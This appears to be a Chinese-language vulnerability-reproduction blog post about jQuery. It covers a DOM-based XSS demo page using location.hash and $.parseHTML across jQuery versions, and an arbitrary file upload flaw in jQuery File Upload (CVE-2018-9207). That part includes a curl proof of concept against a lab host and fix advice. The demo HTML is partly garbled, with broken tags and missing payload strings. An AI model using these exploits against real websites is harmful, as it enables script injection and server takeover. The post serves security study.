jQuery漏洞复现整理

jQuery DOM-based XSS

漏洞详情

在JQuery的诸多发行版本中,存在着DOM-based XSS(跨站脚本攻击的一种)漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞。
2.x的版本可以使用Safari浏览器来弹框。

JavaScript XSS Demo


<html lang="zh">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Jquery XSStitle>
    <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.6.1/jquery.js">script>
    
    
    
    <script>
        $(function () {
            // #9521
            // #11290
            $(location.hash);

            // #11974
            $('#bug').on('click', function () {
                $.parseHTML("");
                return false;
            });
        })
    script>
head>

<body>
    <h1>jQuery with XSSh1>
    <h2>Demo:h2>
    <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!p>
    <ul>
        <li><a href="#" target="_blank">bug-9521a> => <a
                href="https://bugs.jquery.com/ticket/9521" target="_blank">ticketa>li>
        <li><a href="#p[class='']" target="_blank">bug-11290a> => <a
                href="https://bugs.jquery.com/ticket/11290" target="_blank">ticketa>li>
        <li><a href="#11974" id="bug">bug-11974a> => <a href="https://bugs.jquery.com/ticket/11974"
                target="_blank">ticketa>li>
    ul>
    <h2>Test version:h2>
    <ul>
        <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test resulta>li>
    ul>
    <h2>Safe version:h2>
    <ul>
        <li>1.12.0, 1.12.1 li>
        <li>2.2.0, 2.2.1li>
        <li>3.0.0, 3.0.1, 3.1.0, 3.1.1li>
    ul>
body>

html>

1.6.1版本:
jQuery漏洞复现整理_第1张图片
1.9.1版本:
jQuery漏洞复现整理_第2张图片
个别版本无法弹框可以使用Safari浏览器,因为Safari浏览器会经过URL编码进入函数,依然可以使用html5 的一些特性,引发错误并弹框。

jQuery漏洞复现整理_第3张图片

jQuery file upload 文件上传漏洞 (CVE-2018-9207)

漏洞详情

jQuery file upload是一个文件上传小工具,包含多个文件选择,拖放支持,进度条,验证和预览图像,jQuery的音频和视频。支持跨域、分块和可恢复文件上传以及客户端图像大小调整。适用于任何服务器端平台——支持标准HTML表单文件上传(PHP,Python,Ruby on Rails,Java,Node.js,Go等)。

这个漏洞产生主要是因为jQuery-File-Upload的.htaccess文件会限制文件的上传和文件的执行,但是Apache的2.3.9版本中,Apache默认不再支持.htaccess了,而且默认是没有被开启的,所以导致攻击者可以任意上传脚本文件并执行。如果使用了另一种web容器的话(比如Nginx),那么基于.htaccess文件的保护则完全无效。

漏洞复现

在线复现地址
jQuery漏洞复现整理_第4张图片
POC:

curl -F "[email protected]" http://cc2ce5c953d2e3b36bde9f346d4290ea.n2.vsgo.cloud:8395/server/php/index.php

jQuery漏洞复现整理_第5张图片
其实直接点击上传也行,就是一个文件上传漏洞
jQuery漏洞复现整理_第6张图片
wireshark抓包看一下。(注意路径问题)
jQuery漏洞复现整理_第7张图片

修复建议:

1.启用htaccess文件,对上传类型进行限制。
2.更新jQuery file upload至最新版本(https://github.com/blueimp/jQuery-File-Upload)。

你可能感兴趣的:(漏洞复现,javascript,安全,web安全,xss,安全漏洞)